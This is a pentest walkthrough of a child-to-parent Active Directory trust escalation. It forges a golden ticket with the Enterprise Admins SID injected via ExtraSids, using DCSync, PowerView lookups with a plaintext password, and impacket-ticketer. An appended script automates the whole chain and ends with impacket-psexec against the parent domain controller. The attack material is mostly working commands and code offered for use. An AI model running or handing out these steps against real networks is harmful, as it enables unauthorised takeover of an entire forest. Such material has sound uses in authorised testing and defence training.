Example attack: Impacket-Ticketer

Requesting tickets from Kali

In this example we have Domain Admin in the child domain internal.zsm.local, which has a trust with its parent zsm.local. We abuse this parent-child trust (intra-forest trusts do not SID-filter, so an Enterprise Admins SID injected into the ExtraSids of a forged ticket is honoured by the parent) to also get DA in zsm.local.

Attack

(the SID lookups below are done with PowerView on the compromised DC in internal.zsm.local; the DCSync and the ticket forging are done from Kali with impacket)

Collect the AES key of the krbtgt account using DCSync (impacket-secretsdump) against internal.zsm.local (key truncated here):

3bdcbeb0910e5887e6d...e099322ac91cc386ca296a5c5497b0

Get SID of internal.zsm.local:

Get-DomainSID -Domain internal.zsm.local
S-1-5-21-3056178012-3972705859-491075245

Get the SID of zsm.local; note that we pass low-privileged credentials for zsm.local:

$SecPassword = ConvertTo-SecureString 'Pass123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\Marcus', $SecPassword)
Get-DomainSID -Domain zsm.local -Credential $Cred
S-1-5-21-2734290894-461713716-141835440

We now have everything we need to forge the ticket. Note that we pass the user 'Laura', who is a Domain Admin in internal.zsm.local, and that -user-id sets the RID written into the ticket's PAC:

Don't forget to append -519 to the parent domain SID in -extra-sid: 519 is the well-known RID of Enterprise Admins, a group that exists only in the forest root domain.

impacket-ticketer -aesKey 3bdcbeb0910e5887e6d...e099322ac91cc386ca296a5c5497b0 -domain-sid S-1-5-21-3056178012-3972705859-491075245 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-141835440-519 Laura -user-id 6602

Load the ccache in Kali:

export KRB5CCNAME=Laura.ccache

Add the necessary entries in /etc/hosts (the DCs of both domains must resolve by FQDN for Kerberos to work):

We can now access zsm.local with Kerberos auth:
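The Kali-side steps above, assembled into one script as an added example (this is not part of the original notes): it validates both domain SIDs, derives the Enterprise Admins SID from the parent domain SID, builds the impacket-ticketer line from the notes, and in live mode (DRY_RUN=0) forges the ticket, appends the /etc/hosts lines, loads the ccache and tests access. The DC hostnames and IPs, the KRBTGT_AESKEY environment variable (the page truncates the key) and the final impacket-psexec target are assumed placeholders; the SIDs, domains, user and RID are the ones from the notes.

```shell
#!/bin/sh
# Added example, not part of the original notes: assemble, sanity-check and
# (optionally) run the cross-trust golden ticket steps from Kali.
# DC hostnames/IPs and the final psexec target are assumed placeholders.
set -eu

# Values from the notes. The krbtgt key is truncated on the page, so it is read
# from the environment (KRBTGT_AESKEY) instead of being hard-coded.
CHILD_DOMAIN="internal.zsm.local"
PARENT_DOMAIN="zsm.local"
CHILD_SID="S-1-5-21-3056178012-3972705859-491075245"
PARENT_SID="S-1-5-21-2734290894-461713716-141835440"
TARGET_USER="Laura"
TARGET_RID="6602"
KRBTGT_AESKEY="${KRBTGT_AESKEY:-}"
CHILD_DC_FQDN="dc01.internal.zsm.local"   # assumed
CHILD_DC_IP="10.10.10.10"                 # assumed
PARENT_DC_FQDN="dc01.zsm.local"           # assumed
PARENT_DC_IP="10.10.10.1"                 # assumed

# A domain SID is S-1-5-21-<a>-<b>-<c> with no trailing RID. Pasting a user or
# group SID (which carries a fourth number) into -domain-sid is a common mistake.
validate_domain_sid() {
  printf '%s\n' "$1" | grep -Eq '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+$'
}

# Append a well-known RID to a domain SID. 519 is Enterprise Admins, which only
# exists in the forest root, so it is combined with the PARENT domain SID.
sid_with_rid() {
  validate_domain_sid "$1" || return 1
  printf '%s-%s\n' "$1" "$2"
}

enterprise_admins_sid() { sid_with_rid "$1" 519; }

# secretsdump prints AES256 keys as 64 hex chars and AES128 keys as 32.
validate_aes_key() {
  printf '%s\n' "$1" | grep -Eq '^([0-9a-fA-F]{32}|[0-9a-fA-F]{64})$'
}

# The impacket-ticketer line from the notes (args: key, child SID, child
# domain, extra SID, user, RID); the target user is the positional argument.
build_ticketer_cmd() {
  printf 'impacket-ticketer -aesKey %s -domain-sid %s -domain %s -extra-sid %s -user-id %s %s\n' \
    "$1" "$2" "$3" "$4" "$6" "$5"
}

# Kerberos needs both DCs resolvable by FQDN; these are the /etc/hosts lines.
build_hosts_entries() {
  printf '%s %s\n' "$CHILD_DC_IP" "$CHILD_DC_FQDN"
  printf '%s %s\n' "$PARENT_DC_IP" "$PARENT_DC_FQDN"
}

main() {
  validate_domain_sid "$CHILD_SID" || { echo "child domain SID malformed" >&2; return 1; }
  extra_sid=$(enterprise_admins_sid "$PARENT_SID") || { echo "parent domain SID malformed" >&2; return 1; }
  key="$KRBTGT_AESKEY"
  if ! validate_aes_key "$key"; then
    if [ "${DRY_RUN:-1}" = "1" ]; then
      key="<krbtgt-aes-key-from-secretsdump>"
    else
      echo "set KRBTGT_AESKEY to the krbtgt AES key (32 or 64 hex chars)" >&2
      return 1
    fi
  fi
  cmd=$(build_ticketer_cmd "$key" "$CHILD_SID" "$CHILD_DOMAIN" "$extra_sid" "$TARGET_USER" "$TARGET_RID")
  # Assumed final step: any impacket tool with -k works. The domain passed must
  # be the realm of the forged TGT (the child); the host is the parent's DC.
  access="impacket-psexec -k -no-pass ${CHILD_DOMAIN}/${TARGET_USER}@${PARENT_DC_FQDN}"
  if [ "${DRY_RUN:-1}" = "1" ]; then
    echo "# would run:"; echo "$cmd"
    echo "# would append to /etc/hosts:"; build_hosts_entries
    echo "export KRB5CCNAME=${TARGET_USER}.ccache"
    echo "$access"
  else
    $cmd
    build_hosts_entries | sudo tee -a /etc/hosts >/dev/null
    KRB5CCNAME="${TARGET_USER}.ccache"; export KRB5CCNAME
    klist
    $access
  fi
}

main "$@"
```

Run it once with the default DRY_RUN=1 to see the exact commands it will issue, then `KRBTGT_AESKEY=<key> DRY_RUN=0 sh script.sh` to execute them. The SID checks exist because the two easiest ways to get a ticket that the parent rejects are passing a SID that already has a RID on it as -domain-sid, and forgetting that 519 must be appended to the parent's SID rather than the child's.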
